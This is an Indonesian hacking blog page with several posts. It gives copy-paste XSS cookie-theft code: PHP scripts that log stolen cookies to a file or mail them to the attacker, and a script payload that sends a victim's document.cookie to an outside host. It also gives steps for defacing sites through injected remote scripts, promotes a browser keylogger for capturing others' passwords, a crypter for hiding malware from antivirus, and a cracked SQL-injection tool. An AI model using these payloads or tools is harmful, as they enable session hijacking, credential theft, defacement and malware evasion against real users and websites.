Pencurian cookie dengan XSS

0 comments
XSS adalah sebuah kerentanan siitus yang sering saya jumpai pada beberapa situs. Namun kebanyakan Security Researcher memasukan script dengan puncurian cookie. Cookie bisa digunakan untuk mendapatkan Username dan password user, login tanpa harus username dan password, cookie sendiri bisa untuk mendapatkan akun facebook dengan menggunakan tools Wireshark,  tanpa harus mengetahui email dan password korban dengan memanfaatkan Cookie tersebut. Atau di kenal dengan metode Snifers anda bisa mendownload wireshark di postingan saya sebelumnya di top tools Snifers.




How to stolen cookie 


Disini saya akan menggunakan tiga metode untuk pencurian cookie yaitu :

  • Membuat file PHP
  • Membuat file Javascript
  • Mengirim ke email
1. Untuk pencurian cookie dengan metode PHP anda perlu sebuah web hosting gratis dengan support PHP, karena script PHP akan kita upload pada web hosting tersebut.

Untuk membuat file PHP dengan pencurian cookie anda bisa mengcopy script di bawah ini :

<!–?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen(“log.txt”, “a”);
fwrite($steal, $cookie .”\n”);
fclose($steal);
?–>

Selanjutnya simpan script tersebut dengan nama terserah anda format file extensi .php,  misal curi.php

setelah file php dibuat selanjutnya membuat file log.txt,  buka program Notepad dan simpan dengan nama log.txt.


setelah dua file terbuat.
  • Curi.php
  • log.txt
selanjutnya silakan anda upload kedua file tersebut di web hosting gratisan dan ubah CHMOD menjadi 777. Jadi ketika anda memanggil file curi.php, history cookie akan di simpan pada log.txt.


2. Metode yang kedua adalah membuat file javascript dengan pencurian cookie. Berbeda dengan file php javascript akan menampilkan pop-up pada browser , seperti menampilkan Pop-up XSS pada dasarnya. Untuk membuat file cookie dengan extensi  Javascript, silakan anda copy script dibawah ini :

document.write ("Ini adalah Kerentanan XSS menggunakan javascript " + document.cookie);
alert ("Found XSS pada situs ini...! - |@nasrulseven| " + document.cookie);


Simpan dengan nama terserah anda dengan extensi .js, misal xss.js, dan silakan anda upload file javascript terbsut di web hosting yang sama anda buat tadi. Maka hasil code javascript tersebut akan mucul pop-up seperti gambar di bawah ini.




3. Metode yang terakhir adalah mengirimkan cookie tersebut ke alamat email anda. Untuk membuat cookie bisa di kirim ke alamat email anda  silakan copy script php di bawah ini.

<?php
$cookie = $HTTP_GET_VARS["cookie"]; mail(“email_anda@gmail.com”, “Stolen
Cookie XSS”, $cookie);
?>

Untuk yang tulisan dengan font merah silakan anda ganti dengan email anda. Jika email sudah di ganti silakan anda simpan dengan nama send.php atau terserah anda, dan upload. Cookie akan dikirimkan ke email anda ketika anda panggil file send.php. dan hasil cookie akan seperti gambar dibawah.




Untuk memanggil file tersebut bisa gunakan script :

<script>location.href=‘http://www.situsagan.com/file.php?cookie=’+document.cookie;</script>

 Contoh :

htpp://www.situsrentan.com/index.php?search=<script>location.href = ‘http://www.situsgan.com/file.php?cookie=’+document.cookie;</script>


Untuk tiga metode file CHMOD 777.




Enjoy Hacking,,,,

Cara Deface website dengan XSS

0 comments

Deface adalah suatu seni dari teknik hacking dengan berbagai tools yang tersedia namun kebanyakan situs yang mengalami deface adalah situs  yang rentan terhadap SQLI. Namun ada juga teknik lain yang untuk deface namun kebanyakan untuk orang awam atau newbie biasanya menggunakan tools Hmei7 yang buatan defacer asal Semarang Indonesia. Namun saya tidak mengajari anda untuk berbuat seperti itu. Kali ini saya akan membahas deface dengan teknik XSS. Cara ini sangat mudah untuk anda lakukan, karena hanya sedikit paste script pada website yang rentan dengan XSS.






How to deface with XSS


Silakan anda cari website yang rentan terhadap XSS, dan untuk mengeceknya pada url anda tulis sedikit script HTML atau pada box pencarian. Namun paling sering yang saya temui kebanyakan pada box pencarian yang rentan terhadap XSS.


Setelah anda mendapatkan situs yang rentan terhadap XSS, silakan anda copy script di bawah ini dan simpan dengan extensi .js atau javascript. Contoh deface.js



Untuk nama dan gambar anda bisa mengganti dengan yang anda inginkan.


Selanjutnya anda Upload file Javascript tersebut di hosting gratisan.

Jika sudah selesai anda panggil script tersebut dengan perintah :

<script src=http://yoursite.com/your_files.js></script>

Contoh saya mengupload file deface.js di website saya http://nasrulsevenfoldism.tk/deface.js, maka perintahnya adalah :

<script src=http://nasrulsevenfoldism.tk/deface.js></script>

Selanjutnya anda paste script tersebut pada box pencarian, contact atau pada address bar dan lainya. Dan hasilnya akan tampak seperti gambar dibawah ini :







Enjoy Hacking.,,,,

Hack password dengan Xenotix keylogger

0 comments

Banyak orang ingin mendapatkan password mulai dari situs paypal, facebook, gmail,yahoo dan masih banyak lagi. Sebagian orang ingin mendapatkan password dengan cara keylogger, Phising, Sosial Engginering dan lainya. Namun metode keylogger kali ini berbeda dengan lainya, yaitu dengan menggunakan sebuah browser Firefox untuk mendapatkan apa yang di ketikan di browser. Ketika orang mengunjungi sebuah situs facebook dan mereka login maka keylogger ini mencapture setiap ketikan. Dan pemilik komputer tersebut bisa mendapatkan data pengguna apa saja yang mereka ketikan di browser tersebut, bahkan password. Untuk bisa mendapatkan password pada browser anda hanya perlu sebuah add-ons.




Features :

Set Password.
Bypass Key Scrambler.
Bypass Virtual Keyboard.
Undetectable by Anti-Virus.


How to hack password with Xenotix Keylogger


Step 1 : Silakan anda download dahulu Add-ons disini dan anda install.

Step 2 : Setelah anda download dan install maka akan muncul Pop-up untuk membuat password. Password ini akan digunakan melihat Log atau catatan apa saja yang di capture di firefox.




Step 3 : Selanjutnya coba anda mengunjugi sebuah situs atau situs yang ada form Login. Sebagai contoh saya mengunjungi situs facebook, dan saya memasukan email dan password maka Xenotix Keylogger akan mencatat nama situs, Email, dan Password.

untuk bisa melihat data Capture atau log anda tekan  " Shift+Alt+\"  pada keyboard (tanpa tanda ketik).


maka akan muncul pop-up, dan silakan anda masukan password yang anda buat tadi pada Step 2.




dan data email dan password pada situs facebook tadi akan terihat.








Enjoy Hacking,,,,,,,

Porn.com Vulneralibilty XSS

0 comments
This summary is not available. Please click here to view the post.

Download Easy Crypter

0 comments

Ketika anda mendownload sebuah software yang terdetect oleh antivirus maka software bisa-bisa langsung di del oleh antivirus tersebut. Banyak sekali software yang terdetect oleh antivirus kebanyakan tools yang berbau hacker dan software cracked. Dan bagaimana caranya untuk bisa menghidden virus tersebut dan tidak terdeteksi oleh antivirus. Anda bisa menggunakan sebuah software Crypter yang bisa memotong virus dan software tersebut bisa tidak terdetect oleh anti virus. Crypter adalah software yang digunakan untuk menyembunyikan virus, keylogger atau alat anti virus dari sehingga file tidak terdeteksi oleh anti virus.






Features :

  • Algoritma enkripsi yang handal – TripleDES.
  • Pengolahan data kecepatan tinggi.
  • Antarmuka yang sederhana dan intuitif.
  • Kemampuan simultan enkripsi / dekripsi beberapa file.
  • A separate interface for working with the text.






Download Serial Number disini.




Enjoy Friend,,,,

Download Havij 1.15 pro valid 2099

0 comments

Havij adalah salah satu tools yang dibilang sudah cukup baik untuk melakukan kegiatan hacking yaitu teknik SQL Injection. Penggunan ini sangat friendly dengan userface sehingga orang awam yang tak begitu mahir dalam SQL Injection pun bisa melakukan hal ini. Software ini terus berkembang dengan seiring jaman yang masih terus berjalan. Sebelumnya saya sudah memposting salah satu tools yaitu WAppEX anda bisa membaca kembali fitur tools tersebut yang hampir memiliki sistem kerja yang sama. Meskipun kedua software tersebut dibuat oleh ITsecTeam. Namun jika anda menggunakan tools Havij dengan versi free maka fitur akan dibatasi dan jika anda menggunakan versi Pro maka semua fitur akan tersedia. Saya akan membagikan tools tersebut dengan versi Pro yang valid sampai 2099.





New Feature :
  • Dump all.
  • New bypass method for MySQL using parenthesis.
  • Write file feature added for MSSQL and MySQL.
  • Loading HTML form inputs.
  • Saving data in CSV format.
  • Advanced evasion tab in the settings.
  • Injection tab in settings.
  • 'Non-existent injection value' can now be changed by user (the default value is 999999.9).
  • 'Comment mark' can be changed by user (the default value is --).
  • Disabling/enabling of logging.
  • Bugfix: adding manual database in tables tree view.
  • Bugfix: finding string columns in PostgreSQL.
  • Bugfix: MS Access blind string type data extraction
  • Bugfix: MSSQL blind auto detection when error-based method fails
  • Bugfix: all database blind methods fail on retry
  • Bugfix: guessing columns/tables in MySQL time-based injection
  • Bugfix: crashing when dumping into file
  • Bugfix: loading project injection type (Integer or String)
  • Bugfix: HTTPS multi-threading bug
  • Bugfix: command execution in MSSQL 2005


Dibawah ini adalah screenshot dari tools tersebut betapa mudahnya mendapatkan Username dan Password (Md5) Administrator .





Result Analystic Virustotal Here.





Enjoy Hacking,,,,

Admin finder online

0 comments

Sebelumnya saya telah memposting Bagaimana caranya menemukan admin web admininstrator dengan sebuah tools sederhana untuk menemukan sebuah halaman admin untuk login. Kali ini saya akan posting bagiamana caranya menemukan sebuah halaman administator tanpa tools yaitu dengan Online. Kita tahu bahwa sebuah halaman administrator sangat penting jika kita ingin mencoba memasukan SQL Injection. Atau jika anda mencoba test dengan SQL anda juga bisa mencoba di search enggine dengan Google dork.







Admin Finder Online.



Anda bisa mengunjungi situs pemilik yashar disini.

silakan anda masukan situs web yang anda ingin mencoba temukan web halaman admin.

setelah anda masukan silakan anda tunggu beberapa menit untuk mencari halaman admin.

setelah itu akan menampilkan halaman url admin yang telah ditemukan.

u’re done… ^_^





Enjoy Friend,,,,,
DMCA.com

Blog Archive

 

Site info

Free counters! ping fast  my blog, website, or RSS feed for Free Yahoo bot last visit powered by MyPagerank.Net Msn bot last visit powered by MyPagerank.Net Text Backlink Exchanges Kostenlose Backlinks bei http://www.backlink-clever.de

| Hackers Trix 7 © 2010. All Rights Reserved | Template Style by Lord HTML | Design by MBT | Back To Top |

Your Text Link Here